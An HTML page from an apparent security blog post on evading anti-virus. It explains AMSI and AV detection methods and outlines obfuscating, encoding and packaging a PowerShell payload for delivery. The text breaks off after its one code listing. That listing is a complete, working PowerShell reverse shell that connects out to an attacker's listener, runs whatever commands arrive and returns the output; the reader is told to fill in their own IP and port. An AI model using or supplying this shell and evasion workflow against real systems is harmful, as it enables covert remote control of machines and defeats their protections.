
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <meta name="author" content="['@kf0k']">
      
      
      <link rel="icon" href="../../assets/logo.png">
      <meta name="generator" content="mkdocs-1.2.3, mkdocs-material-7.3.4">
    
    
      
        <title>Basic Anti-Virus Evasion - Blog</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.db9e7362.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.3f5d1f46.min.css">
        
          
          
          <meta name="theme-color" content="#000000">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:300,400,400i,700%7CSource+Code+Pro&display=fallback">
        <style>:root{--md-text-font-family:"Ubuntu";--md-code-font-family:"Source Code Pro"}</style>
      
    
    
    
    
      


    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="black" data-md-color-accent="">
  
    
    <script>function __prefix(e){return new URL("../..",location).pathname+"."+e}function __get(e,t=localStorage){return JSON.parse(t.getItem(__prefix(e)))}</script>
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#overview" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="Blog" class="md-header__button md-logo" aria-label="Blog" data-md-component="logo">
      
  <img src="../../assets/logo.png" alt="logo">

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Blog
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Basic Anti-Virus Evasion
            
          </span>
        </div>
      </div>
    </div>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      
<div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" aria-label="Clear" tabindex="-1">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-tabs__inner md-grid">
    <ul class="md-tabs__list">
      
        
  
  


  <li class="md-tabs__item">
    <a href="../.." class="md-tabs__link">
      Security Stuff
    </a>
  </li>

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../Cheatsheets/" class="md-tabs__link">
        Cheatsheets
      </a>
    </li>
  

      
        
  
  
    
  


  
  
  
    <li class="md-tabs__item">
      <a href="./" class="md-tabs__link md-tabs__link--active">
        Posts
      </a>
    </li>
  

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../Writeups/" class="md-tabs__link">
        Writeups
      </a>
    </li>
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="Blog" class="md-nav__button md-logo" aria-label="Blog" data-md-component="logo">
      
  <img src="../../assets/logo.png" alt="logo">

    </a>
    Blog
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        Security Stuff
      </a>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_2" type="checkbox" id="__nav_2" >
      
      
      
      
        <label class="md-nav__link" for="__nav_2">
          Cheatsheets
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Cheatsheets" data-md-level="1">
        <label class="md-nav__title" for="__nav_2">
          <span class="md-nav__icon md-icon"></span>
          Cheatsheets
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Cheatsheets/" class="md-nav__link">
        Overview
      </a>
    </li>
  

            
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_2_2" type="checkbox" id="__nav_2_2" >
      
      
      
      
        <label class="md-nav__link" for="__nav_2_2">
          AD
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="AD" data-md-level="2">
        <label class="md-nav__title" for="__nav_2_2">
          <span class="md-nav__icon md-icon"></span>
          AD
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Cheatsheets/AD/" class="md-nav__link">
        General
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
    
  
  
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_3" type="checkbox" id="__nav_3" checked>
      
      
      
      
        <label class="md-nav__link" for="__nav_3">
          Posts
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Posts" data-md-level="1">
        <label class="md-nav__title" for="__nav_3">
          <span class="md-nav__icon md-icon"></span>
          Posts
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
      
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          Basic Anti-Virus Evasion
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        Basic Anti-Virus Evasion
      </a>
      
        
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#overview" class="md-nav__link">
    Overview
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#theory" class="md-nav__link">
    Theory
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#steps" class="md-nav__link">
    Steps
  </a>
  
    <nav class="md-nav" aria-label="Steps">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#download-reverse-shell-ps-script" class="md-nav__link">
    Download Reverse Shell PS Script
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#download-invoke-obfuscator" class="md-nav__link">
    Download Invoke-Obfuscator
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#obfuscate-the-reverse-shell-ps-script" class="md-nav__link">
    Obfuscate the Reverse Shell PS Script
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#obfuscate-the-obfuscated-script" class="md-nav__link">
    Obfuscate the Obfuscated Script
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#encode-the-obfuscated-ps-script" class="md-nav__link">
    Encode the Obfuscated PS Script
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#bypass-amsi" class="md-nav__link">
    Bypass AMSI
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#memes-break" class="md-nav__link">
    Memes Break
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#building-the-executable-file" class="md-nav__link">
    Building the Executable File
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#delivering-the-payload" class="md-nav__link">
    Delivering The Payload
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#references" class="md-nav__link">
    References
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

            
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../osint_into_da/" class="md-nav__link">
        From OSINT Into Domain Admin
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4" type="checkbox" id="__nav_4" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4">
          Writeups
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Writeups" data-md-level="1">
        <label class="md-nav__title" for="__nav_4">
          <span class="md-nav__icon md-icon"></span>
          Writeups
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Writeups/" class="md-nav__link">
        Overview
      </a>
    </li>
  

            
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4_2" type="checkbox" id="__nav_4_2" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4_2">
          Machines
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Machines" data-md-level="2">
        <label class="md-nav__title" for="__nav_4_2">
          <span class="md-nav__icon md-icon"></span>
          Machines
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4_2_1" type="checkbox" id="__nav_4_2_1" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4_2_1">
          Active
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Active" data-md-level="3">
        <label class="md-nav__title" for="__nav_4_2_1">
          <span class="md-nav__icon md-icon"></span>
          Active
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Writeups/machines/active/writeup/" class="md-nav__link">
        Active
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4_2_2" type="checkbox" id="__nav_4_2_2" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4_2_2">
          Bastian
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Bastian" data-md-level="3">
        <label class="md-nav__title" for="__nav_4_2_2">
          <span class="md-nav__icon md-icon"></span>
          Bastian
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Writeups/machines/bastian/writeup/" class="md-nav__link">
        Bastian
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4_2_3" type="checkbox" id="__nav_4_2_3" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4_2_3">
          Intelligence
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Intelligence" data-md-level="3">
        <label class="md-nav__title" for="__nav_4_2_3">
          <span class="md-nav__icon md-icon"></span>
          Intelligence
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Writeups/machines/intelligence/Intelligence/" class="md-nav__link">
        Intelligence
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4_2_4" type="checkbox" id="__nav_4_2_4" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4_2_4">
          Knife
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Knife" data-md-level="3">
        <label class="md-nav__title" for="__nav_4_2_4">
          <span class="md-nav__icon md-icon"></span>
          Knife
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Writeups/machines/knife/knife-writeup/" class="md-nav__link">
        Knife
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4_2_5" type="checkbox" id="__nav_4_2_5" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4_2_5">
          Love
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Love" data-md-level="3">
        <label class="md-nav__title" for="__nav_4_2_5">
          <span class="md-nav__icon md-icon"></span>
          Love
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Writeups/machines/love/love/" class="md-nav__link">
        Love Write-up
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4_2_6" type="checkbox" id="__nav_4_2_6" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4_2_6">
          Monitors
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Monitors" data-md-level="3">
        <label class="md-nav__title" for="__nav_4_2_6">
          <span class="md-nav__icon md-icon"></span>
          Monitors
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Writeups/machines/monitors/monitors/" class="md-nav__link">
        Monitors
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
            
              
  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="__nav_4_2_7" type="checkbox" id="__nav_4_2_7" >
      
      
      
      
        <label class="md-nav__link" for="__nav_4_2_7">
          Shoker
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <nav class="md-nav" aria-label="Shoker" data-md-level="3">
        <label class="md-nav__title" for="__nav_4_2_7">
          <span class="md-nav__icon md-icon"></span>
          Shoker
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
            
              
  
  
  
    <li class="md-nav__item">
      <a href="../../Writeups/machines/shoker/writeup/" class="md-nav__link">
        Shocker Write-up
      </a>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

            
          
        </ul>
      </nav>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#overview" class="md-nav__link">
    Overview
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#theory" class="md-nav__link">
    Theory
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#steps" class="md-nav__link">
    Steps
  </a>
  
    <nav class="md-nav" aria-label="Steps">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#download-reverse-shell-ps-script" class="md-nav__link">
    Download Reverse Shell PS Script
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#download-invoke-obfuscator" class="md-nav__link">
    Download Invoke-Obfuscator
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#obfuscate-the-reverse-shell-ps-script" class="md-nav__link">
    Obfuscate the Reverse Shell PS Script
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#obfuscate-the-obfuscated-script" class="md-nav__link">
    Obfuscate the Obfuscated Script
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#encode-the-obfuscated-ps-script" class="md-nav__link">
    Encode the Obfuscated PS Script
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#bypass-amsi" class="md-nav__link">
    Bypass AMSI
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#memes-break" class="md-nav__link">
    Memes Break
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#building-the-executable-file" class="md-nav__link">
    Building the Executable File
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#delivering-the-payload" class="md-nav__link">
    Delivering The Payload
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#references" class="md-nav__link">
    References
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content" data-md-component="content">
            <article class="md-content__inner md-typeset">
              
                
                
                  <h1>Basic Anti-Virus Evasion</h1>
                
                <h2 id="overview">Overview<a class="headerlink" href="#overview" title="Permanent link">&para;</a></h2>
<p>After I obtained eCPTX certificate and completed Offshore lab from Hack The Box I learned multiple ways to bypass Anti-Virus solutions. Offshore was containing multiple machines with AV, additionally, we faced deferent Anti-Virus solution with clients. So dealt with multiple scenarios to bypass the AV. Bypassing AV can be easy just by playing with the payload or it can be complicated, depending the AV solution and how it detect the malware (signature based, behavior based, etc...). In this blog, I'll demonstrate simple method to bypass Anti-Virus to obtain reverse shell using PowerShell script. </p>
<p>An overview of the steps that I'll follow: </p>
<ol>
<li>Using <code>Reverse-TCP</code> PowerShell script.</li>
<li>Obfuscate the <code>Reverse-TCP</code> PowerShell script .</li>
<li>Base64 encoding the obfuscated <code>Reverse-TCP</code> PowerShell script. </li>
<li>Using AMSI bypass script.  </li>
<li>Coverting the encoded script &amp; AMSI bypass script into executable file. </li>
<li>Delivering the Payload. </li>
</ol>
<h2 id="theory">Theory<a class="headerlink" href="#theory" title="Permanent link">&para;</a></h2>
<p>I'll explain here some of basic concepts of AMSI, how Anti-Virus products detect the malware and etc. So if you know the concepts you can skip this part. </p>
<ul>
<li>
<p><strong>AMSI</strong>:</p>
<p>AMSI stands for Anti Malware Scan Interface. AMSI is an interface for applications and services to integrate with antimalware products. AMSI used for scanning files and memory streams, content source, URL/IP reputation checks and other techniques. </p>
</li>
<li>
<p><strong>Detection Methods in Anti-Virus</strong>:</p>
<ul>
<li><strong>Signature Based</strong>: by matching strings, signatures, hashes and patterns of known malware from the database. </li>
<li><strong>Heuristic Based</strong>: it is similar to signature based detection in terms of searching for specific strings, it looks for commands that has malicious intent and would not be mostly found in an application.</li>
<li><strong>Behavioral Based</strong>: it looks for events created by the program. As an example, spawinng <code>cmd.exe</code> or calling a sequence of functions that indicate potential process injection. </li>
<li><strong>Sandbox Detection</strong>: In this type of detection, the program runs in virtualized environment and it is behavior is recorded, at the end all program behavior will analyzed. The anti-virus application will be able to see in details what the program will do in that environment. </li>
</ul>
</li>
</ul>
<hr />
<h2 id="steps">Steps<a class="headerlink" href="#steps" title="Permanent link">&para;</a></h2>
<h3 id="download-reverse-shell-ps-script">Download Reverse Shell PS Script<a class="headerlink" href="#download-reverse-shell-ps-script" title="Permanent link">&para;</a></h3>
<p>Use the following PowerShell script, change listening IP and the port: <code>reverse-tcp.ps1</code>
<div class="highlight"><pre><span></span><code><span class="nv">$client</span> <span class="p">=</span> <span class="nv">$null</span><span class="p">;</span>
<span class="nv">$stream</span> <span class="p">=</span> <span class="nv">$null</span><span class="p">;</span>
<span class="nv">$buffer</span> <span class="p">=</span> <span class="nv">$null</span><span class="p">;</span>
<span class="nv">$writer</span> <span class="p">=</span> <span class="nv">$null</span><span class="p">;</span>
<span class="nv">$data</span> <span class="p">=</span> <span class="nv">$null</span><span class="p">;</span>
<span class="nv">$result</span> <span class="p">=</span> <span class="nv">$null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>

    <span class="nv">$client</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">Net</span><span class="p">.</span><span class="n">Sockets</span><span class="p">.</span><span class="n">TcpClient</span><span class="p">(</span><span class="s2">&quot;127.0.0.1&quot;</span><span class="p">,</span> <span class="n">9000</span><span class="p">);</span>
    <span class="nv">$stream</span> <span class="p">=</span> <span class="nv">$client</span><span class="p">.</span><span class="n">GetStream</span><span class="p">();</span>
    <span class="nv">$buffer</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">Byte</span><span class="p">[]</span> <span class="n">1024</span><span class="p">;</span>
    <span class="nv">$encoding</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">Text</span><span class="p">.</span><span class="n">AsciiEncoding</span><span class="p">;</span>
    <span class="nv">$writer</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">IO</span><span class="p">.</span><span class="n">StreamWriter</span><span class="p">(</span><span class="nv">$stream</span><span class="p">);</span>
    <span class="nv">$writer</span><span class="p">.</span><span class="n">AutoFlush</span> <span class="p">=</span> <span class="nv">$true</span><span class="p">;</span>
    <span class="nv">$bytes</span> <span class="p">=</span> <span class="n">0</span><span class="p">;</span>
    <span class="k">do</span> <span class="p">{</span>
        <span class="nv">$writer</span><span class="p">.</span><span class="n">Write</span><span class="p">(</span><span class="s2">&quot;PS&gt;&quot;</span><span class="p">);</span>
        <span class="k">do</span> <span class="p">{</span>
            <span class="nv">$bytes</span> <span class="p">=</span> <span class="nv">$stream</span><span class="p">.</span><span class="n">Read</span><span class="p">(</span><span class="nv">$buffer</span><span class="p">,</span> <span class="n">0</span><span class="p">,</span> <span class="nv">$buffer</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="nv">$bytes</span> <span class="o">-gt</span> <span class="n">0</span><span class="p">)</span> <span class="p">{</span>
                <span class="nv">$data</span> <span class="p">=</span> <span class="nv">$data</span> <span class="p">+</span> <span class="nv">$encoding</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="nv">$buffer</span><span class="p">,</span> <span class="n">0</span><span class="p">,</span> <span class="nv">$bytes</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="nv">$stream</span><span class="p">.</span><span class="n">DataAvailable</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="nv">$bytes</span> <span class="o">-gt</span> <span class="n">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="nv">$data</span> <span class="p">=</span> <span class="nv">$data</span><span class="p">.</span><span class="n">Trim</span><span class="p">();</span>
            <span class="k">if</span> <span class="p">(</span><span class="nv">$data</span><span class="p">.</span><span class="n">Length</span> <span class="o">-gt</span> <span class="n">0</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">try</span> <span class="p">{</span>
                    <span class="nv">$result</span> <span class="p">=</span> <span class="nb">Invoke-Expression</span> <span class="n">-Command</span> <span class="nv">$data</span> <span class="n">2</span><span class="p">&gt;&amp;</span><span class="n">1</span> <span class="p">|</span> <span class="nb">Out-String</span><span class="p">;</span>
                <span class="p">}</span> <span class="k">catch</span> <span class="p">{</span>
                    <span class="nv">$result</span> <span class="p">=</span> <span class="nv">$_</span><span class="p">.</span><span class="n">Exception</span> <span class="p">|</span> <span class="nb">Out-String</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="nb">Clear-Variable</span> <span class="n">-Name</span> <span class="s2">&quot;data&quot;</span><span class="p">;</span>
                <span class="nv">$length</span> <span class="p">=</span> <span class="nv">$result</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span>
                <span class="k">if</span> <span class="p">(</span><span class="nv">$length</span> <span class="o">-gt</span> <span class="n">0</span><span class="p">)</span> <span class="p">{</span>
                    <span class="nv">$count</span> <span class="p">=</span> <span class="n">0</span><span class="p">;</span>
                    <span class="k">do</span> <span class="p">{</span>
                        <span class="k">if</span> <span class="p">(</span><span class="nv">$length</span> <span class="o">-ge</span> <span class="nv">$buffer</span><span class="p">.</span><span class="n">Length</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$bytes</span> <span class="p">=</span> <span class="nv">$buffer</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nv">$bytes</span> <span class="p">=</span> <span class="nv">$length</span><span class="p">;</span> <span class="p">}</span>
                        <span class="nv">$writer</span><span class="p">.</span><span class="n">Write</span><span class="p">(</span><span class="nv">$result</span><span class="p">.</span><span class="n">substring</span><span class="p">(</span><span class="nv">$count</span><span class="p">,</span> <span class="nv">$bytes</span><span class="p">));</span>
                        <span class="nv">$count</span> <span class="p">+=</span> <span class="nv">$bytes</span><span class="p">;</span>
                        <span class="nv">$length</span> <span class="p">-=</span> <span class="nv">$bytes</span><span class="p">;</span>
                    <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="nv">$length</span> <span class="o">-gt</span> <span class="n">0</span><span class="p">);</span>
                    <span class="nb">Clear-Variable</span> <span class="n">-Name</span> <span class="s2">&quot;result&quot;</span><span class="p">;</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="nv">$bytes</span> <span class="o">-gt</span> <span class="n">0</span><span class="p">);</span>

<span class="p">}</span> <span class="k">catch</span> <span class="p">{</span>
    <span class="nb">Write-Host</span> <span class="nv">$_</span><span class="p">.</span><span class="n">Exception</span><span class="p">.</span><span class="n">InnerException</span><span class="p">.</span><span class="n">Message</span><span class="p">;</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="nv">$writer</span> <span class="o">-ne</span> <span class="nv">$null</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$writer</span><span class="p">.</span><span class="n">Close</span><span class="p">();</span>
        <span class="nv">$writer</span><span class="p">.</span><span class="n">Dispose</span><span class="p">();</span>
        <span class="nb">Clear-Variable</span> <span class="n">-Name</span> <span class="s2">&quot;writer&quot;</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span><span class="nv">$stream</span> <span class="o">-ne</span> <span class="nv">$null</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$stream</span><span class="p">.</span><span class="n">Close</span><span class="p">();</span>
        <span class="nv">$stream</span><span class="p">.</span><span class="n">Dispose</span><span class="p">();</span>
        <span class="nb">Clear-Variable</span> <span class="n">-Name</span> <span class="s2">&quot;stream&quot;</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span><span class="nv">$client</span> <span class="o">-ne</span> <span class="nv">$null</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$client</span><span class="p">.</span><span class="n">Close</span><span class="p">();</span>
        <span class="nv">$client</span><span class="p">.</span><span class="n">Dispose</span><span class="p">();</span>
        <span class="nb">Clear-Variable</span> <span class="n">-Name</span> <span class="s2">&quot;client&quot;</span><span class="p">;</span>
    <span class="p">}</span>
